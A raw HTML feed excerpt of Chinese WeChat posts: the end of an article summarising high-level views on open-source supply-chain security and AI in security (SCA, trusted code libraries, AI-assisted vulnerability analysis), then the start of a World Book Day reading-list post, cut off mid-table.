Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">保镖</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">→</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">免疫力</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">可有可无</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">→</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">阻碍业务</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">→</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">与业务协同</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">)</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#5B9BD5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 网络安全正在发生重大变化,从早期的&#34;拳套&#34;(可有可无)到&#34;保镖&#34;(阻碍业务),再到未来的&#34;免疫力&#34;(与业务协同)。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 未来的安全应该像人体内的白细胞,能自然地应对威胁而不影响正常业务运作。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 开源治理和安全左移很契合,在引入阶段做好安全工作可以避免后续很多麻烦。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 有人提出建立官方维护的安全库的想法,但实现起来比较困难。可以考虑多方协作的半开源模式。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 开源安全治理的核心是检测机制(规则/算法/引擎),可以应用于各个环节。</span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 6. SCA(软件成分分析)和代码审计虽然都针对源代码,但分别作用于不同阶段。可以在流程中衔接使用。</span></p><p><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">6.2 </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">安全厂商视角的</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">SCA</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">发展</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 1. AI技术带来的变化:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>生成式AI可能被用于发现漏洞、执行攻击、制作恶意软件变种等,对传统安全防御体系构成挑战。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>安全技术也可以与AI融合,提升防护能力。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 2. 开源安全的重要性:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>需要官方与安全力量合作,建立可信的代码库、组件库、依赖库等。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>通过可信代码库实现源头治理。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 供应链安全面临的挑战:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>如何保证官方代码库的安全性和责任界定。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>效率和完全自主可控之间的平衡。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 未来发展方向:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>AI与安全技术的深度融合。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>建立可信代码库和依赖库。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>加强源头治理。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 总的来说,供应链安全面临AI带来的新挑战,需要在开源管理、技术创新和责任机制等方面做出调整和改进。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> </span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">6.3 其他</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span>    <o:page></o:page></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 安全能力应该从可选(optional)到必选(mandatory),最终成为</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">默认(by default)的关联能力</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。基础技术应该形成默认的安全检测能力,提高</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">内生安全</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 利用AI提高安全检测和治理能力是未来的重要方向。AI可以减少反应时间,提高检测效率,帮助应对海量软件的安全问题。</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 3. 一些企业正在探索AI在安全领域的应用,包括:</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>利用大模型进行运维降噪</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>构建AI BOM(物料清单)来评估AI模型的安全性</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>利用AI分析漏洞库,实现代码层面的可达性分析</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>尝试用AI辅助自动化修复漏洞</span></p><p><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 4. 供应链安全是一个重要研究方向,正在进行一些</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">交叉领域</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">的尝试。</span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"> 5. 虽然一些大厂商在AI安全方面已经做得很好,但对于体量较大的企业来说,仍需要进行更多的探索和实践。</span><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"></span>    <o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484043">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1b692845&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484043%26idx%3D1%26sn%3Da14c7ebe5537687392a220c82598ccd5%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 03 Jul 2024 12:34:00 +0800</pubDate>
    </item>
    <item>
      <title>读万卷书，行千里路，师友百十，一定畅快！</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484022&amp;idx=1&amp;sn=4542b0e27521bcbcb02070e49f95079d</link>
      <description>今天是世界读书日，我享受阅读带来的乐趣。以认真笔记、看了再看为必要条件，列了一个不是书单的《书单》，向过去一年启蒙我的师友们表示尊重和感谢。</description>
      <content:encoded><![CDATA[<p>
原创 <span>书种即人种</span> <span>2024-04-23 21:14</span> <span style="display: inline-block;">上海</span>
</p>

<p>今天是世界读书日，我享受阅读带来的乐趣。以认真笔记、看了再看为必要条件，列了一个不是书单的《书单》，向过去一年启蒙我的师友们表示尊重和感谢。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=7955ddf7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINw7fjWeOIpbVsf7ks2nPkAQ9s8VnHFibiaob4OnX6WYiaamvNSJZZc9ZBZSPnZZzg5llhhRREsDDwXGw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">今天是世界读书日，我享受阅读带来的乐趣。以认真笔记、看了再看为必要条件，列了一个不是书单的《书单》，向过去一年启蒙我的师友们表示尊重和感谢。</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="442" valign="top" style="width: 331.25pt;border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);text-decoration: none;font-size: 15px;"><span style="color: rgb(0, 0, 255);font-family: 微软雅黑;font-size: 15px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">零、先放彩蛋</span><span style="color: rgb(0, 0, 255);font-family: 微软雅黑;font-size: 15px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">：</span><span style="color: rgb(0, 0, 255);font-family: 微软雅黑;font-size: 15px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">闲暇容易产生火花</span></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);text-decoration: none;font-size: 15px;">一、敏捷：先进、愉快的生产协作方式是什么？</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);text-decoration: none;font-size: 15px;">二、心理学：近年和敏捷结合最紧密的学科</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);text-decoration: none;font-size: 15px;">三、工业软件：软件学科的本源在哪里？</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="text-decoration: none;color: rgb(0, 0, 255);font-family: 微软雅黑;text-indent: 0pt;letter-spacing: 0.034em;font-size: 15px;">四、供应链：压箱底的技术怎么发挥价值？<br/></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="text-decoration: none;font-size: 15px;"><span style="text-decoration: none;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);">五、智能：</span><span style="text-decoration: none;font-family: Calibri;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);">AI</span><span style="text-decoration: none;font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);">会踹破专业门槛吗？</span></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-variant: normal;text-transform: none;text-decoration: none;color: rgb(0, 0, 255);font-family: 微软雅黑;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;font-size: 15px;">六、大数据：大数据领域最核心的是什么？</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-variant: normal;text-transform: none;color: rgb(0, 0, 255);text-decoration: none;font-size: 15px;">七、人文社科：<span style="font-variant: normal;text-transform: none;text-decoration: none;color: rgb(0, 0, 255);font-family: 微软雅黑;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">多学科交相辉映</span>，容易惠己达人</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size: 15px;text-indent: 0pt;letter-spacing: 0.034em;"><span style="font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 255);">附、我的上届</span><span style="font-family: Calibri;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 255);">“</span><span style="font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 255);">书单</span><span style="font-family: Calibri;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 255);">”</span></span><span style="font-size: 15px;text-indent: 0pt;font-family: Calibri;letter-spacing: 0.034em;"> </span><br/></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size: 15px;"><span style="font-size: 15px;font-family: Calibri;text-indent: 0pt;letter-spacing: 0.034em;"></span></span></p></td></tr></tbody></table><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 16pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(20, 50, 77);font-weight: bold;"><br/></span></p><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 16pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(20, 50, 77);font-weight: bold;">零、先放彩蛋：闲暇容易产生火花</span>    <o:page></o:page></p><table cellspacing="0" cellpadding="0" width="578"><tbody><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: 